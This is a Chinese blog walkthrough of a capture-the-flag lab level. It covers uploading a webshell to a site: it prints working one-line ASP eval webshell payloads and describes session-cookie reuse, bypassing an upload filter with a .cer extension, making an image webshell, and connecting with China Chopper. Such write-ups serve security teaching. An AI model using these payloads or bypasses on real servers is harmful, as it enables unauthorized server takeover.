Get Shell! — 绕过防护上传木马

本文详细介绍了Webshell的概念,包括其作为服务器权限获取工具的原理,以及一句话ASP木马的工作方式。文章通过实例展示了如何寻找并利用上传点,上传一句话木马,制作图片马,并使用菜刀工具进行远程连接和控制。这一过程揭示了网站安全的潜在风险及防护的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

封神台四

一、原理

1、什么是Shell?

  • web的含义显然是需要服务器开放web服务
  • shell是一个人机交互页面
  • 拿shell的含义是取得对服务器/电脑某种程度上的操作权限
  • webshell拿到网站服务器的权限(shell)

木马可以帮助我们拿到shell,以达到控制网站服务器的目的,也有人称之为网站的后门工具。

2、一句话asp

<% eval request (“test”) %>
eval 执行
request 从用户那里取得信息

木马:执行从用户那里取得信息

3、木马原理

  1. 小马 特点:小 功能:上传大马
  2. 大马 特点:功能繁琐 功能:各种各样

二、探索

1、寻找上传点

能上传附件的地方
我们查看上一章获取到的管理员cookie
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC

1、将其添加到cookie中,刷新即可进入管理员用户(演示的是谷歌浏览器)
在这里插入图片描述
2、刷新后进入到管理员页面
在这里插入图片描述
3、可以发现产品管理处可以上传文件
在这里插入图片描述
4、尝试上传一张图片,可以通过地址访问到图片
在这里插入图片描述

2、上传一句话木马

1、创建一个2.asp文件,尝试上传
<%eval request(“chopper”)%>

2、发现文件被拦截
在这里插入图片描述
3、我们修改文件后缀为cer

为什么呢,存在默认配置错误,开始配置完存在默认的cer指向asp.dll后缀名,所以也可以被执行
修改了后缀上传后发现
在这里插入图片描述
发现是文件太小造成的
在这里插入图片描述
我们给他添加一些内容在上传,发现可以上传成功
在这里插入图片描述

3、图片马制作

准备一张图片1.jpg
带木马的文件 2.asp
通过指令行 合成一个 3.png
在这里插入图片描述

在这里插入图片描述

发现成功隐藏信息

在这里插入图片描述

4、菜刀连接

通过我们上传木马的网址,和request后面的密码即可连接到服务器
在这里插入图片描述
拿到flag
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

微笑伴你而行

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值